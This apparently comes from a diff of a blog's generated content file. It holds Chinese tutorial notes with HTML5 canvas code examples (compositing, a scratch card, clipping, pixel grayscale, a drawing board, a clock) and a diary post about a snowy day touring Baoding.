    20-transform 使用矩阵完成图像变换操作

    • transform(a, b, c, d, e, f),直接对变形矩阵进行修改:
      • $\begin{bmatrix} a & c & e \ b & d & f \ 0 & 0 & 1 \end{bmatrix}$
    1
    2
    3
    4
    5
    6
    7
    8
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度
    // 3. 绘制图形
    // transform 进行位移,水平坐标轴不变,1, 0, 竖直坐标轴不变 0, 1
    ctx.transform(1, 1, -1, 1, 50, 0);
    ctx.fillRect(0, 0, 500, 50);

    png

    21-canvas 合成图像模式

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度
    // 3. 绘制图形
    ctx.fillStyle = "#F00";
    ctx.fillRect(300, 200, 100, 100);
    ctx.globalCompositeOperation = "source-in"
    ctx.fillStyle = "#00F";
    ctx.fillRect(250, 150, 100, 100);

    png

    22-合成图像实现刮刮卡

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    #ggk{
    width: 600px;
    height: 400px;
    font-size: 30px;
    font-weight: 900;
    text-align: center;
    line-height: 400px;
    overflow: hidden;
    position: absolute;
    left: 0;
    top: 0;
    }
    1
    2
    <div id="ggk">谢谢惠顾</div>
    <canvas style="position: absolute; border: 1px solid #ccc; z-index: 2;" id="c" width="600" height="400"></canvas>
    • 使用 <canvas> 盖住刮刮卡背后的文字。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度
    // 3. 绘制图形
    let img = new Image();
    img.src = "./imgs/m2.png";
    img.onload = function(){
    ctx.drawImage(img, 0, 0, 600, 400);
    }
    var isDraw = false;
    c.onmousedown = function(){
    isDraw = true;
    }
    c.onmouseup = function(){
    isDraw = false;
    }
    c.onmousemove = function (e) {
    if (isDraw) {
    var x = e.pageX;
    var y = e.pageY;

    ctx.globalCompositeOperation = "destination-out";

    ctx.arc(x, y, 20, 0, 2 * Math.PI);
    ctx.fill();
    }
    };

    let random = Math.random();
    if (random < 0.1) {
    var ggkDiv = document.querySelector("#ggk");
    ggkDiv.innerHTML = "恭喜您获得 IPHONE14 PRO 大奖!";
    }
    • 通过按下鼠标并移动在鼠标的位置画圆实现刮刮卡的效果。

    • ctx.globalCompositeOperation = "destination-out"; 将圆形和遮罩重叠的部分设为透明。


    • 最终效果:

    23-裁剪路径

    ​ 裁切路径和普通的 canvas 图形差不多,不同的是它的作用是遮罩,用来隐藏不需要的部分。所有在路径以外的部分都不会在canvas 上绘制出来。

    • clip() 将当前构建的路径转换为当前的裁剪路径。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    // 1. 找到画布
    var c = document.getElementById('c')
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度
    // 起点
    var heartPath = new Path2D();
    heartPath.moveTo(300, 200);// 2个控制点、1个终点
    heartPath.bezierCurveTo(350, 150, 400, 200, 300, 250);
    heartPath.bezierCurveTo(200, 200, 250, 150, 300, 200);
    ctx.stroke(heartPath);
    var chatPath = new Path2D();
    chatPath.moveTo(200, 300);
    chatPath.quadraticCurveTo(150, 300, 150, 200);
    chatPath.quadraticCurveTo(150, 100, 300, 100);
    chatPath.quadraticCurveTo(450, 100, 450, 200);
    chatPath.quadraticCurveTo(450, 300, 250, 300);
    chatPath.quadraticCurveTo(250, 350, 150, 350);
    chatPath.quadraticCurveTo(200, 350, 200, 300);
    ctx.clip(chatPath);
    ctx.fill(heartPath);

    // 获取图片
    let img = new Image();
    img.src = "./imgs/girl.webp";
    img.onload = function (){
    // 第一种方式绘制,(图片对象,水平位置,垂直位置)
    // ctx.drawImage(img, 0, 0);
    // 第二种方式绘制,能够缩放图片(图片对象,水平位置,垂直位置,缩放到对应宽度,缩放到对应高度)
    ctx.drawImage(img, 0, 0, 600, 400);
    // 第三种方式绘制,能够裁剪图片,img 参数后面的四个参数分别为源图片上面你要裁剪的起点位置和矩形的宽高,后面四个参数分别为画布的位置和要渲染的矩形的宽高
    ctx.drawImage(img, 640, 0, 1280, 720, 0, 0, 600, 400);
    // 给对话框描边
    ctx.lineWidth = 20;
    ctx.stroke(chatPath);
    }

    png

    24-状态的保存和恢复

    • save() 将当前状态压入一个栈中。
    • restore() 从栈中取出一个状态并应用之。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度
    // 3. 绘制图形
    ctx.fillStyle = "red";
    ctx.fillRect(0, 0, 100, 100);
    ctx.save();

    ctx.fillStyle = "blue";
    ctx.fillRect(100, 100, 100, 100);
    ctx.save();

    ctx.fillStyle = "yellow";
    ctx.fillRect(200, 200, 100, 100);
    ctx.save();

    ctx.fillStyle = "green";
    ctx.fillRect(300, 300, 100, 100);
    ctx.save();

    ctx.restore();
    ctx.fillRect(400, 400, 100, 100);

    ctx.restore();
    ctx.fillRect(500, 500, 100, 100);

    ctx.restore();
    ctx.fillRect(600, 600, 100, 100);

    ctx.restore();
    ctx.fillRect(700, 700, 100, 100);

    png

    25-像素操作

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度

    // 获取图片
    let img = new Image();
    img.src = "imgs/girl.webp";
    img.onload = function (){
    ctx.drawImage(img, 0, 0, 600, 400);

    let imageData = ctx.getImageData(0, 0, 600, 400);
    console.log(imageData);
    // 循环修改数据
    for (let i = 0; i < imageData.data.length; i+= 4)
    {
    let gray = imageData.data[i] * 0.3 + imageData.data[i + 1] * 0.59 + imageData.data[i + 2] * 0.11;
    imageData.data[i] = gray;
    imageData.data[i + 1] = gray;
    imageData.data[i + 2] = gray;
    imageData.data[i + 3] = 255;
    }
    ctx.putImageData(imageData, 0, 0, 0, 0, 300, 400);
    }

    png

    26-高级封装绘制元素和实现元素交互

    • 这节大概是讲怎么应用面向对象的思想吧……

    • Javascript 创建一个 Heart 类,并设计 constructor() 构造函数,使用 draw() 绘制图案。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度

    class Heart{
    constructor(x, y){
    this.x = x;
    this.y = y;
    this.heartPath = new Path2D();
    this.heartPath.moveTo(this.x, this.y);
    this.heartPath.bezierCurveTo(
    this.x + 50,
    this.y - 50,
    this.x + 100,
    this.y,
    this.x,
    this.y + 50
    );
    this.heartPath.bezierCurveTo(
    this.x - 100,
    this.y,
    this.x - 50,
    this.y - 50,
    this.x,
    this.y
    );
    }
    draw(){
    ctx.save();
    ctx.fillStyle = "red";
    ctx.fill(this.heartPath);
    ctx.restore();
    }
    }
    let heart = new Heart(100, 100);
    heart.draw();
    • 设计一下 onmousemove() 让用户在鼠标移向图案的时候,图案变色:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度

    class Heart{
    constructor(x, y){
    this.x = x;
    this.y = y;
    this.color = "red";
    this.heartPath = new Path2D();
    this.heartPath.moveTo(this.x, this.y);
    this.heartPath.bezierCurveTo(
    this.x + 50,
    this.y - 50,
    this.x + 100,
    this.y,
    this.x,
    this.y + 50
    );
    this.heartPath.bezierCurveTo(
    this.x - 100,
    this.y,
    this.x - 50,
    this.y - 50,
    this.x,
    this.y
    );
    c.onmousemove = (e) => {
    let x = e.offsetX;
    let y = e.offsetY;
    let isIn = ctx.isPointInPath(this.heartPath, x, y);
    if (isIn)
    {
    this.color = "blue";
    }else{
    this.color = "red";
    }
    }
    }
    draw(){
    ctx.save();
    ctx.fillStyle = this.color;
    ctx.fill(this.heartPath);
    ctx.restore();
    }
    }
    let heart = new Heart(100, 100);
    function render(){
    ctx.clearRect(0, 0, c.width, c.height);
    heart.draw();
    requestAnimationFrame(render);
    }
    render();

    更牛逼的写法……emmm 学不来。

    • 创建一个 Heart 对象,并注册了其 onHoveronLeave 事件,当鼠标悬停在心形图形上时,颜色变为蓝色;当鼠标离开时,颜色变回红色。

    • 创建一个 render 函数,使用 requestAnimationFrame 方法定期重新绘制心形图形,从而实现动画效果。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    var ctx = c1.getContext("2d");

    class Heart {
    constructor(x, y) {
    this.x = x;
    this.y = y;
    this.color = "red";
    this.isIn = false;
    this.eventMapList = {
    hover: [],
    leave: [],
    };

    c1.onmousemove = (e) => {
    let x = e.offsetX;
    let y = e.offsetY;
    this.isIn = ctx.isPointInPath(this.heartPath, x, y);
    if (this.isIn) {
    this.eventMapList.hover.forEach((item) => {
    item();
    });
    } else {
    this.eventMapList.leave.forEach((item) => {
    item();
    });
    }
    };
    }
    onHover(fn) {
    this.eventMapList.hover.push(fn);
    }
    onLeave(fn) {
    this.eventMapList.leave.push(fn);
    }
    setPosition(x, y) {
    this.x = x;
    this.y = y;
    }
    draw() {
    this.heartPath = new Path2D();
    // 起点
    this.heartPath.moveTo(this.x, this.y);
    // 2 个控制点、1 个终点
    this.heartPath.bezierCurveTo(
    this.x + 50,
    this.y - 50,
    this.x + 100,
    this.y,
    this.x,
    this.y + 50
    );
    this.heartPath.bezierCurveTo(
    this.x - 100,
    this.y,
    this.x - 50,
    this.y - 50,
    this.x,
    this.y
    );
    ctx.save();
    ctx.fillStyle = this.color;
    ctx.fill(this.heartPath);

    ctx.restore();
    }
    }
    let heart = new Heart(100, 100);
    heart.onHover(() => {
    heart.color = "blue";
    });
    heart.onLeave(() => {
    heart.color = "red";
    });
    function render() {
    ctx.clearRect(0, 0, c1.width, c1.height);
    heart.draw();
    requestAnimationFrame(render);
    }
    render();

    27-canvas 实现在线画板

    • 设置若干按钮:

      • boldBtn 粗画笔

        • 调整模式为画笔模式 source-over
        • 将画笔粗细设为 20
        • 设置按钮显示状态
        1
        2
        3
        4
        5
        6
        7
        boldBtn.onclick = function () {
        ctx.globalCompositeOperation = 'source-over';
        ctx.lineWidth = 20;
        boldBtn.classList.add('active');
        thinBtn.classList.remove('active');
        clearBtn.classList.remove('active');
        }
      • thinBtn 细画笔

        • 调整模式为画笔模式 source-over

        • 将画笔粗细设为 1

        • 设置按钮显示状态

        1
        2
        3
        4
        5
        6
        7
        thinBtn.onclick = function () {
        ctx.globalCompositeOperation = 'source-over';
        ctx.lineWidth = 1;
        thinBtn.classList.add('active');
        boldBtn.classList.remove('active');
        clearBtn.classList.remove('active');
        }
      • saveBtn 保存图像

        • 把当前画布下载并保存
        1
        2
        3
        4
        5
        6
        7
        saveBtn.onclick = function () {
        var urlData = canvas.toDataURL();
        var downloadA = document.createElement('a');
        downloadA.setAttribute('download', '酷炫签名');
        downloadA.href = urlData;
        downloadA.click();
        }
      • color 调色

        • 设置画笔颜色
        1
        2
        3
        inputColor.onchange = function () {
        ctx.strokeStyle = inputColor.value;
        }
      • clearBtn 橡皮擦

        • 调整模式为擦除模式 destination-out
        • 将画笔粗细设为 30
        • 设置按钮显示状态
        1
        2
        3
        4
        5
        6
        7
        clearBtn.onclick = function () {
        ctx.globalCompositeOperation = 'destination-out';
        ctx.lineWidth = 30;
        clearBtn.classList.add('active');
        thinBtn.classList.remove('active');
        boldBtn.classList.remove('active');
        }
      • nullBtn 清空画布

        1
        2
        3
        nullBtn.onclick = function () {
        ctx.clearRect(0, 0, 800, 600);
        }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    <canvas id="c" width="600" height="400">
    当前浏览器不支持 canvas,请下载最新的浏览器
    <a href="https://www.google.cn/intl/zh-CN/chrome/">立即下载</a>
    </canvas>
    <hr>
    <button id="boldBtn" type="button">粗线条</button>
    <button id="thinBtn" class="active" type="button">细线条</button>
    <button id="saveBtn" type="button">保存签名</button>
    <input type="color" name="" id="color" value="" />
    <button id="clearBtn">橡皮擦</button>
    <button id="nullBtn">清空画布</button>

    <script>
    // 1. 找到画布
    var canvas = document.getElementById("c");

    // 判断是否有 getContext
    if (!canvas.getContext) {
    console.log("当前浏览器不支持 canvas,请下载最新的浏览器");
    }
    // 2. 获取画笔,上下文对象
    var ctx = canvas.getContext("2d");

    var boldBtn = document.querySelector('#boldBtn');
    var thinBtn = document.querySelector('#thinBtn');
    var inputColor = document.querySelector('#color');
    // 保存签名
    var saveBtn = document.querySelector('#saveBtn');
    // 橡皮擦按钮
    var clearBtn = document.querySelector('#clearBtn');
    // 清空画布
    var nullBtn = document.querySelector('#nullBtn');
    // 设置允许绘制的变量
    var isDraw = false;

    canvas.onmousedown = function () {
    isDraw = true;
    ctx.beginPath();
    var x = event.pageX - canvas.offsetLeft;
    var y = event.pageY - canvas.offsetTop;
    ctx.moveTo(x, y);
    }

    canvas.onmouseleave = function () {
    isDraw = false;
    ctx.closePath();
    }

    canvas.onmouseup = function () {
    isDraw = false;
    ctx.closePath();
    }

    canvas.onmousemove = function () {
    if (isDraw) {
    var x = event.pageX - canvas.offsetLeft;
    var y = event.pageY - canvas.offsetTop;
    ctx.lineTo(x, y);
    ctx.stroke();
    }
    }

    boldBtn.onclick = function () {
    ctx.globalCompositeOperation = 'source-over';
    ctx.lineWidth = 20;
    boldBtn.classList.add('active');
    thinBtn.classList.remove('active');
    clearBtn.classList.remove('active');
    }

    thinBtn.onclick = function () {
    ctx.globalCompositeOperation = 'source-over';
    ctx.lineWidth = 1;
    thinBtn.classList.add('active');
    boldBtn.classList.remove('active');
    clearBtn.classList.remove('active');
    }

    clearBtn.onclick = function () {
    ctx.globalCompositeOperation = 'destination-out';
    ctx.lineWidth = 30;
    clearBtn.classList.add('active');
    thinBtn.classList.remove('active');
    boldBtn.classList.remove('active');
    }

    nullBtn.onclick = function () {
    ctx.clearRect(0, 0, 800, 600);
    }

    saveBtn.onclick = function () {
    var urlData = canvas.toDataURL();
    var downloadA = document.createElement('a');
    downloadA.setAttribute('download', '酷炫签名');
    downloadA.href = urlData;
    downloadA.click();
    }

    inputColor.onchange = function () {
    ctx.strokeStyle = inputColor.value;
    }
    </script>

    28-canvas 绘制动态时钟

    • var time = new Date(); 获取当前时间

    • render() 下每秒重绘:

      • 绘制表盘
        • 时针刻度
        • 分针刻度
      • 绘制指针
        • 时针
        • 分针
        • 秒针
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    var c = document.querySelector("#c");
    var ctx = c.getContext("2d");

    function render() {
    ctx.clearRect(0, 0, 800, 600);
    // 存档,保存当前坐标位置和上下文对象的状态
    ctx.save();
    ctx.translate(400, 300);
    ctx.rotate(-Math.PI / 2);

    ctx.save();
    for (var i = 0; i < 12; i++) {
    // 绘制小时的刻度
    ctx.beginPath();
    ctx.moveTo(170, 0);
    ctx.lineTo(190, 0);
    ctx.lineWidth = 8;
    ctx.strokeStyle = "gray";
    ctx.stroke();
    ctx.closePath();
    ctx.rotate((2 * Math.PI) / 12);
    }

    ctx.restore();
    ctx.save();
    for (var i = 0; i < 60; i++) {
    // 绘制小时的刻度
    ctx.beginPath();
    ctx.moveTo(180, 0);
    ctx.lineTo(190, 0);
    ctx.lineWidth = 2;
    ctx.strokeStyle = "gray";
    ctx.stroke();
    ctx.closePath();
    ctx.rotate((2 * Math.PI) / 60);
    }
    ctx.restore();
    ctx.save();

    // 获取当前时间
    var time = new Date();
    var hour = time.getHours();
    var min = time.getMinutes();
    var sec = time.getSeconds();
    hour = hour >= 12 ? hour - 12 : hour;

    // 绘制秒针
    ctx.rotate(((2 * Math.PI) / 60) * sec);
    ctx.beginPath();
    ctx.moveTo(-30, 0);
    ctx.lineTo(190, 0);
    ctx.lineWidth = 2;
    ctx.strokeStyle = "red";
    ctx.stroke();
    ctx.closePath();
    ctx.restore();
    ctx.save();

    // 绘制分针
    ctx.rotate(
    ((2 * Math.PI) / 60) * min + ((2 * Math.PI) / 60 / 60) * sec
    );
    ctx.beginPath();
    ctx.moveTo(-20, 0);
    ctx.lineTo(130, 0);
    ctx.lineWidth = 4;
    ctx.strokeStyle = "#888";
    ctx.stroke();
    ctx.closePath();
    ctx.restore();
    ctx.save();

    // 绘制时钟
    ctx.rotate(
    ((2 * Math.PI) / 12) * hour +
    ((2 * Math.PI) / 12 / 60) * min +
    ((2 * Math.PI) / 12 / 60 / 60) * sec
    );
    ctx.beginPath();
    ctx.moveTo(-15, 0);
    ctx.lineTo(110, 0);
    ctx.lineWidth = 8;
    ctx.strokeStyle = "#333";
    ctx.stroke();
    ctx.closePath();
    ctx.restore();
    ctx.restore();
    requestAnimationFrame(render);
    }

    render();

    ​ 当前时间是:

    ]]>
    @@ -3758,7 +3758,7 @@ /posts/Diary-%E4%B8%8D%E4%BC%9A%E5%90%A7%E4%B8%8D%E4%BC%9A%E5%90%A7%E4%B8%8D%E4%BC%9A%E8%BF%98%E6%9C%89%E4%BA%BA%E6%B2%A1%E8%A7%81%E8%BF%87%E9%9B%AA%E5%90%A7/ -

    前言

    ​ 河北省气象台发布天气实况,10 日白天到 11 日早晨,除承德东部、唐山、秦皇岛外,全省其他大部地区出现降雪天气,降雪区平均降水量 5.8 毫米

    ​ 人生中第一次见到,不得好好记录下?


    ​ 本次博客添加全新下雪特效😇!

    <div><canvas id="snow" style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:99999;pointer-events:none"></canvas></div>
    <script>const notMobile = (!(navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)));</script>
    <script async type="text/javascript" src="https://cdn.jsdelivr.net/gh/Candinya/Kratos-Rebirth@latest/source/js/snow.min.js"></script>
    <script>const snow = document.getElementById("snow");
    const postDiv = document.querySelector(".post");
    postDiv.appendChild(snow);
    </script>

    正文

    12.10

    ​ 按之前的天气预报,这天白天会下中雪,结果白天一看转成多云了🤨,真是太不幸运了!

    21:51 下雪了!

    jpg

    ​ 同门拍视频给我告诉我下雪了,我赶忙跑到宿舍窗台看,吃了一阵西北风🙄。大晚上下雪估计只有在路灯底下才能看到吧。

    ​ 这天 3 楼洗衣房断网了,所以没得洗衣服,计划第二天凌晨去 1 楼洗衣房把衣服洗了。

    12.11

    05:06 白雪皑皑

    jpg

    ​ 大早上爬起来看看窗外,好家伙半夜下的雪可真够大的,整个地板都是白色了。

    ​ 还好机智的我早已把电瓶车移到了室内😎!没得被淋。

    ​ 然后就下楼把衣服扔洗衣机了。

    05:10 雪落大地

    jpg

    ​ 宿管阿姨要 6 点才开门,只好在宿舍楼里趴向窗台看雪,窗台上已经堆了厚厚的一层,把雪聚起来捏一捏扔下去玩。

    06:03 垃圾桶

    jpg

    ​ 出去解决一下早餐问题,外面好一片繁华景象!就连垃圾桶都这么有特色🤪。一大早扫雪大爷还没来得及扫雪,于是我踢雪玩。

    06:06 雪还在下!

    gif

    ​ 天空还在下雪,感觉跟棉絮一样。

    ​ 冀大还有瓷砖地板,得小心翼翼避免滑倒。

    06:58 河宝,还是河贝

    jpg

    ​ 解决完早饭,晾好衣服,准备去看看外面的世界!

    ​ 冀大的吉祥物都长了白白的眉毛。

    07:01 出!

    jpg

    ​ 刚刚日出的保定。

    07:24 东湖公园

    jpg

    ​ 到东湖公园擦个边,雪已经积到了结冰的湖面上。

    ​ 我觉得下雪的古莲花池一定很好看,于是乘公交车去古莲花池。这段时间保定提倡节能减排,12.11 - 12.31 公交免费,好评!周一早高峰 5 km 堵了 1 小时,差评!

    ​ 在公交车上还被保定大妈指指点点,说小伙子你怎么踢得满鞋子都是雪😇。

    08:32 西大街

    jpg

    ​ 堵得实在受不了了,这速度跟走路都差不多了。看了下刚好到西大街,提前下车!

    08:34 花灯笼

    jpg

    ​ 保定版三坊七巷还是那么崭新又衰败。

    08:34 积雪雕塑大爷

    jpg

    ​ 旁边的雕塑给我看乐了。

    08:52 神秘的光园

    jpg

    ​ 贯穿西大街再迂回至古莲花池,这段路我已经熟悉得不怎么依靠导航了。

    ​ 半路中三刷光园,很好它还是不开门。

    08:55 长信宫灯

    jpg

    ​ 总督署门口的假 · 长信宫灯。

    09:00 石狮

    jpg

    ​ 古莲花池门口的白头发石狮子。旁边一堆铲雪大爷大妈。

    09:01 三刷古莲花池

    jpg

    ​ 三刷古莲花池,¥30。售票员还说了一句今天应该会有很多人拍照😇。

    ​ 怪石上的积雪蛮好看的。

    09:04 直隶图书馆

    jpg

    ​ 直隶图书馆门口的白头发石狮子。

    09:05 桥与亭

    jpg

    ​ 又见面了,一桥和一亭!后来看别人的摄影作品感觉往后面走从门洞里面拍也不错,下次可以试试🤔。

    09:06 走廊

    jpg

    ​ 花花绿绿的走廊里,花白的走廊外。

    09:14 经典高手位

    jpg

    ​ 又来到了经典高手位,三刷古莲花池,三拍高手位。

    09:19 柳树下

    jpg

    ​ 新高手位——从柳树枝叶的缝隙间拍宛虹亭。

    09:22 观澜亭

    jpg

    ​ 白屋顶观澜。

    09:25 告辞!古莲花池!

    jpg

    ​ 走了两圈该撤了。

    09:34 天主教堂

    jpg

    ​ 来到了天主教堂!正门有个建筑物十分讨厌,只能从旁边开广角才能拍出教堂的全貌。

    ​ 天主教堂前面已经扫得很干净,很勤快啊!

    09:35 耶稣

    jpg

    ​ 雪松下的十字架。

    09:36 圣母玛丽亚

    jpg

    ​ 白雪包围的圣母玛利亚。

    09:38 十字架

    jpg

    ​ 积雪的十字架。

    09:45 大慈阁

    jpg

    ​ 再去看看大慈阁。之前听说大慈阁年久失修被取消了 AA 级景区评级,这次到门口直接关门不让进了😅。侧边拍一张,准备下一站——动物园!

    09:51 人民照像

    jpg

    ​ 再次横穿西大街。

    10:17 平房

    jpg

    ​ 前往动物园,途中护城河旁边的小巷子。

    ​ 动物园冷清得让我在外面看以为它关门了😇,后来才觉得很少会有傻子下雪天逛动物园,动物全在睡大觉。

    10:35 猴哥

    jpg

    ​ 吃雪的猴哥。

    jpg

    ​ 攀爬的猴哥。

    ​ 顺带一提,据说这个猴山非常牛逼,石头是从圆明园里搬出来的。

    10:37 别有洞天

    jpg

    ​ 鸟类馆里的别有洞天。

    10:39 鸟哥

    jpg

    ​ 雪地上的各种鹤。

    10:45 睡大觉哥

    jpg

    ​ 本来来动物园的目的就是能看老虎能在雪上漫步呢,好吧也想过它十有八九在睡大觉😅。

    jpg

    ​ 那就 P 一只老虎上去。

    10:49 保定古城墙

    jpg

    ​ 据说,动物园北边的墙是保定城的古城墙。

    10:50 城墙上

    jpg

    ​ 城墙上的积雪。

    10:53 二刷猴哥

    jpg

    ​ 这时候手机快没电了,注意到入口那里有个工作人员电瓶车充电桩,于是又回去偷偷充电。

    ​ 于是又见到你了!猴哥!

    ​ 逛完动物园差不多也该回去了,我想保定市区也就这些地方比较好玩了,极限半天速通保定!该回冀大了。

    11:58 狗子

    jpg

    ​ 冀大门口玩雪的狗子。

    12:23 银杏大道

    jpg

    ​ 被踩得稀烂的雪。

    12:24 松树

    jpg

    ​ 宿舍楼门口的松树。行了累了差不多该午睡了。

    ​ 舍友说下午带我堆雪人捏,我还特意看了网课——如何堆雪人:先揉一个雪球,然后在地上滚,越滚越大就行了。

    14:33 小雪人

    jpg

    ​ 已经到了下午了,看来上午有很多人已经堆起了雪人🤔。

    14:38 唐僧

    jpg

    ​ 抽烟的唐僧。

    14:40 大雪人

    jpg

    ​ 操场上居然有一人高的雪人,真是太牛逼了!

    ​ 试了一会儿没堆起来,而且我忘记戴手套了,太冷了,改打雪仗了。

    ​ 打不过,被解哥暴击😇。

    14:50 杰哥牌山西刀削面

    jpg

    ​ 杰哥用小刀把雪球削成方的,做了个骰子,结果一扔就散了。

    15:16 杰哥牌人工降雪

    jpg

    ​ 杰哥表演了一下人工降雪,用脚踢树,然后树下的人就会落汤鸡😇。

    jpg

    ​ 粉红仔解哥:🙂。

    总结

    jpg
    西大街 光园 古莲花池 直隶图书馆 宛虹亭 天主教堂 大慈阁 动物园 冀大
    jpg
    ]]>
    +

    前言

    ​ 河北省气象台发布天气实况,10 日白天到 11 日早晨,除承德东部、唐山、秦皇岛外,全省其他大部地区出现降雪天气,降雪区平均降水量 5.8 毫米

    ​ 人生中第一次见到,不得好好记录下?


    ​ 本次博客添加全新下雪特效😇!

    1
    2
    3
    4
    5
    6
    7
    <div><canvas id="snow" style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:99999;pointer-events:none"></canvas></div>
    <script>const notMobile = (!(navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)));</script>
    <script async type="text/javascript" src="https://cdn.jsdelivr.net/gh/Candinya/Kratos-Rebirth@latest/source/js/snow.min.js"></script>
    <script>const snow = document.getElementById("snow");
    const postDiv = document.querySelector(".post");
    postDiv.appendChild(snow);
    </script>

    正文

    12.10

    ​ 按之前的天气预报,这天白天会下中雪,结果白天一看转成多云了🤨,真是太不幸运了!

    21:51 下雪了!

    jpg

    ​ 同门拍视频给我告诉我下雪了,我赶忙跑到宿舍窗台看,吃了一阵西北风🙄。大晚上下雪估计只有在路灯底下才能看到吧。

    ​ 这天 3 楼洗衣房断网了,所以没得洗衣服,计划第二天凌晨去 1 楼洗衣房把衣服洗了。

    12.11

    05:06 白雪皑皑

    jpg

    ​ 大早上爬起来看看窗外,好家伙半夜下的雪可真够大的,整个地板都是白色了。

    ​ 还好机智的我早已把电瓶车移到了室内😎!没得被淋。

    ​ 然后就下楼把衣服扔洗衣机了。

    05:10 雪落大地

    jpg

    ​ 宿管阿姨要 6 点才开门,只好在宿舍楼里趴向窗台看雪,窗台上已经堆了厚厚的一层,把雪聚起来捏一捏扔下去玩。

    06:03 垃圾桶

    jpg

    ​ 出去解决一下早餐问题,外面好一片繁华景象!就连垃圾桶都这么有特色🤪。一大早扫雪大爷还没来得及扫雪,于是我踢雪玩。

    06:06 雪还在下!

    gif

    ​ 天空还在下雪,感觉跟棉絮一样。

    ​ 冀大还有瓷砖地板,得小心翼翼避免滑倒。

    06:58 河宝,还是河贝

    jpg

    ​ 解决完早饭,晾好衣服,准备去看看外面的世界!

    ​ 冀大的吉祥物都长了白白的眉毛。

    07:01 出!

    jpg

    ​ 刚刚日出的保定。

    07:24 东湖公园

    jpg

    ​ 到东湖公园擦个边,雪已经积到了结冰的湖面上。

    ​ 我觉得下雪的古莲花池一定很好看,于是乘公交车去古莲花池。这段时间保定提倡节能减排,12.11 - 12.31 公交免费,好评!周一早高峰 5 km 堵了 1 小时,差评!

    ​ 在公交车上还被保定大妈指指点点,说小伙子你怎么踢得满鞋子都是雪😇。

    08:32 西大街

    jpg

    ​ 堵得实在受不了了,这速度跟走路都差不多了。看了下刚好到西大街,提前下车!

    08:34 花灯笼

    jpg

    ​ 保定版三坊七巷还是那么崭新又衰败。

    08:34 积雪雕塑大爷

    jpg

    ​ 旁边的雕塑给我看乐了。

    08:52 神秘的光园

    jpg

